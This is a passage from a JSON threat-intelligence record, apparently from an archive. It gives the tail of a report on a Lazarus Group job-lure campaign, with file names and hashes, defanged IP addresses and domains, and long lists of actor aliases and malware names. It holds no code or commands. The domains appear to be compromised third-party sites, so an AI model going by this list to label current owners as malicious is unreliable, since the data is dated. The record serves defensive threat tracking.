0dba9eaac49d78c69\r\nGD2020090939393903.doc 415cd5c206baf793708952777ae0c987 6db80e381260eab8c93ee51bed40b1d5c38601bb 7d235c717a031fc794\r\nGD2020090939393903.doc 6e815cacb43c9bc055399a4fd4922ebc fe1894d343484cb3dc7ec16bef8252bd64cb7b6e 1174fd03271f80f5e2\r\nGD20200909GAB31.doc 2e83293e8da65d54253ca3b5bd87c414 188415339edc3b54f6627f57bc77d4d500a670a3 bc54765b4790b5a0a\r\nGD20200909GAB31.doc b2b8a0f74500bc0a93a7e54b06de5020 b42b60fc26bce51269ba6641fdf406a3491e6c6d 385b758ae75075b54\r\nGDLS_2020090392828334.doc 8ed89d14dee005ea59634aade15dba97 ea93acf0c278dd59e29ae1402d35db8e0f3ae966 9c906c2f3bfb24883a\r\nGDLS202009069871.doc 
058542975392c9636371b88a3f6142d7 e8cdac8acff9a39d016095c165b7c366e93adec5 75bf8feeac2b5b1690\r\nGDLS202009069871.pdf e5ff537666b387c39a406cbbb359b2ed 4610a559b21b7e5e62925c115863e82ffa0b8977 e13888eed2466efaae\r\nGDLS47129481.docx 994c02f8c721254a959ed9bc823ab94b 610960413c81cf391a8f28fb83b2482f446953ca 17f1c3dc3ad9e0e87e\r\nInternalPDFViewer.exe - - 2aa3fd1c4b1036efc7\r\nMemoryCacher.dat bc731ade86b380e87eb6188b7f2b4255 3ccec13409045f9a6903a3bee1db474c75f959fe c3a6e07ab16c8c887\r\nMSSqlite3.lnk 2a0da707ab46c53d9af2f059c3150c62 e7526de25b1f759c7a7bbe61095cfebbae7c158d e8ae38308c499577a\r\nMSSqlite3Svc.lnk ea9ff940a65e650ef2090148b0e67853 1d24d431daf8566a84432a149989c43f57c4a5ef fcaead308afb9cc4fb3\r\nregid.mdb 963e8cfaa40226ba2e5d516464572446 fc64890ac49970cccdc80826d40e50f50b5d5b6f 7434c5de43c561780\r\nregid.mdb 277962f69a26cc7ac55e9dceb83af9d1 e9e691f11cfecb706c29f729ae660240ee9acbcb cca1ee1d92f7dac860\r\nusomsqlite3.lgs.dat c2c399e9e78dbe447c3971014881ca05 c5abf0f2903b0549c20a8f964af7c4d24e730d9a e924b7c21b298ab18\r\nvolitile.dat - - 30cc1612fa94be4e02\r\nIP Domain Country Organization\r\n182.48.49[.]233 goldllama4.sakura[.]ne.jp JP AS9371 SAKURA Internet Inc.\r\n150.60.192[.]67 propro[.]jp JP AS9597 KDDI Web Communications Inc.\r\n54.64.30[.]175 vega.mh-tec[.]jp JP AS16509 Amazon.com\r\n164.46.106[.]43 hospitality-partners[.]co.jp JP AS4694 IDC Frontier Inc.\r\n118.128.190[.]191 apars-surgery[.]org KR AS3786 LG DACOM Corporation\r\n160.153.142[.]0 akramportal[.]org NL AS21501 Host Europe GmbH\r\n198.133.183[.]67 bootcamp-coders.cnm[.]edu US AS4869 Central New Mexico Community College\r\n166.62.39[.]82 clicktocareers[.]com  US AS26496 GoDaddy.com\r\n23.152.0[.]232 forecareer[.]com US AS8100 QuadraNet Enterprises LLC\r\n162.241.219[.]119 gbflatinamerica[.]com US AS46606 Unified Layer\r\n92.249.45[.]182 inovecommerce[.]com.br US AS47583 Hostinger International Limited\r\nSource: 
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 20 of 20",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/"
	],
	"report_names": [
		"lazarus-recruitment"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434264,
	"ts_updated_at": 1775792300,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2af2d8cb54bdb9d6befda3b634d5c15da281d6c5.pdf",
		"text": "https://archive.orkl.eu/2af2d8cb54bdb9d6befda3b634d5c15da281d6c5.txt",
		"img": "https://archive.orkl.eu/2af2d8cb54bdb9d6befda3b634d5c15da281d6c5.jpg"
	}
}